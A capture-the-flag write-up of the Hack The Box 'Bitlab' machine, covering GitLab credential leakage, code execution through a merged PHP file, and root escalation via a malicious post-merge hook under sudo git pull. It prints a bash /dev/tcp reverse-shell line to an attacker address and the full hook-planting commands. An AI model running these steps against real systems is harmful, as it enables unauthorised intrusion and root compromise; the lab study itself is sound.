Bitlab - Medium Box running on Linux. GitLab // x32dbg // Debugging // PostgreSQL // git pull // JavaScript
ENUMERATION
NMAP
So, let’s first start with nmap:
Nmap scan report for 10.10.10.114
Host is up (0.087s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open http nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
|_http-title: GitLab is not responding (502)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 is the only interesting port to continue enumerating: nginx is fronting a GitLab instance (both the robots.txt entries and the “GitLab is not responding (502)” title point at it).
GOBUSTER
luka@kali:~/htb/bitlab$ gobuster dir -u http://10.10.10.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -k -s 200,204,301,307,401,403
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.114
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
===============================================================
/help (Status: 301)
/profile (Status: 301)
/search (Status: 200)
/public (Status: 200)
/root (Status: 200)
Checking the web server manually
There appears to be a bookmarks HTML file that looks like a leak.
EXPLOITATION
JS Deobfuscation
The “Gitlab Login” bookmark seems to store credentials for GitLab, but its JavaScript is obfuscated. Just throwing it into jsnice.org (it can be done manually as well!) reveals the password.
The credentials work for GitLab on port 80.
GitLab Misconfiguration
After logging in and checking both repositories on GitLab, it turns out that the “Deployer” repository does a few things, including running sudo git pull.
Some IFs in that script have to be satisfied first, so let’s do that.
Go to the Profile repo and create a new branch off master.
Add a new file to it.
Put code inside (PHP).
Next create a merge request, request the merge and merge without making any changes.
If everything has been done correctly you should see something like this:
And the file is also in its place:
… and remote code execution works:
Swap that for a reverse shell:
And a shell was popped:
There are two privilege escalation paths. One exploits the sudo git pull; the other finishes the code found in the GitLab snippets to get the credentials of the user clave.
PRIVILEGE ESCALATION
PrivEsc#1: git pull may be run as sudo
Let’s first start with “sudo git pull”.
I used the post-merge hook since that was the only one that worked; pre-commit didn’t fire. That is expected: pre-commit is only invoked by git commit, and a pull does not commit anything, whereas post-merge runs after every successful merge, fast-forward pulls included.
NOTE: since we need to copy the whole repository somewhere we have write access to, the remote must also have a new commit to pull, otherwise the pull reports “Already up to date” and the hook never runs. So just create a single file in the Profile repo on GitLab, like below:
Copy the repository to /tmp and create a weaponized post-merge hook (start a listener on port 4243 first). One caveat for newer targets: git 2.35.2 and later refuses to run in a repository owned by another user (“dubious ownership”) unless safe.directory is configured, which would stop root’s pull in a www-data-owned /tmp/profile; that check evidently does not apply on this box.
cp -r /var/www/html/profile/ /tmp/                        # copy the deployed repo somewhere writable
echo '#!/bin/bash' > /tmp/profile/.git/hooks/post-merge   # hooks live inside the working copy, so we control them
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.10/4243 0>&1"' >> /tmp/profile/.git/hooks/post-merge   # reverse shell to the attacker
chmod +x /tmp/profile/.git/hooks/post-merge               # git only runs executable hooks
sudo /usr/bin/git pull                                    # runs as root and executes post-merge once the merge completes
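To see the mechanism behind this hook without touching sudo, here is an added example (it is not from the writeup or from the box): a local, unprivileged reproduction in sh. It builds a throwaway upstream repository standing in for the GitLab Profile repo, clones it (standing in for the copy of /var/www/html/profile in /tmp), plants a post-merge hook that only drops a marker file instead of a reverse shell, adds a commit upstream so the pull has something to merge, and then pulls. The repository names, paths, identity and marker file are all made up for the demo; git itself must be installed.

```shell
#!/bin/sh
# Added example, not code from the Bitlab writeup: a local, unprivileged
# reproduction of why "sudo git pull" hands out root. Git executes
# .git/hooks/post-merge from the *working copy* after every successful merge,
# fast-forward pulls included, so whoever can write that file runs code as the
# user performing the pull. Here the hook only drops a marker file; on the box
# the same slot holds the reverse-shell one-liner and the pull runs via sudo.
set -eu

git_q() { git "$@" >/dev/null 2>&1; }   # quiet wrapper so the function's stdout stays clean

demo_post_merge_hook() {
    work=$(mktemp -d)
    marker="$work/hook-ran-as-$(id -un)"
    # constructed identity so commits work without a ~/.gitconfig
    export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
    export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid

    # 1. "upstream" stands in for the GitLab Profile repository.
    git_q init "$work/upstream"
    echo 'hello' > "$work/upstream/index.html"
    git_q -C "$work/upstream" add index.html
    git_q -C "$work/upstream" commit -m 'initial'

    # 2. "deploy" stands in for the copy of /var/www/html/profile in /tmp:
    #    a clone the attacker can write to, hooks directory included.
    git_q clone "$work/upstream" "$work/deploy"
    cat > "$work/deploy/.git/hooks/post-merge" <<EOF
#!/bin/sh
# payload: on Bitlab this is the bash /dev/tcp reverse shell; here, a marker file
touch "$marker"
EOF
    chmod +x "$work/deploy/.git/hooks/post-merge"

    # 3. Something must actually be merged: a pull that is already up to date
    #    never calls post-merge. This mimics "create a file in the Profile repo".
    echo 'trigger' > "$work/upstream/trigger.txt"
    git_q -C "$work/upstream" add trigger.txt
    git_q -C "$work/upstream" commit -m 'trigger deploy'

    # 4. The pull (root's "sudo /usr/bin/git pull" on the box) fires the hook.
    git_q -C "$work/deploy" pull --ff-only

    if [ -e "$marker" ]; then echo hook-ran; else echo hook-not-run; fi
    rm -rf "$work"
}

# Uncomment to run by hand:
# demo_post_merge_hook
```

Calling demo_post_merge_hook prints hook-ran, the marker having been created by the hook during the pull. Delete step 3 and it prints hook-not-run, which is exactly the “Already up to date” situation the NOTE above warns about: the copied repository needs a fresh commit on the remote before the hook ever gets a chance to run.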
Root:
PrivEsc#2: PostgreSQL
The snippet can be found in GitLab under the Snippets menu.
The code is only missing a line that prints the query results.
A username and password were retrieved.
After SSHing onto the box as clave, there is a file called “RemoteConnection.exe” in clave’s home directory. I pulled the file to a Windows machine and opened it in x32dbg (Ghidra and 64-bit dnSpy didn’t work!).
PrivEsc#2 continued: x32dbg (retrieving the password from the stack)
At some point the binary puts root’s password on the stack.
The password works over SSH; I didn’t try running the file directly :)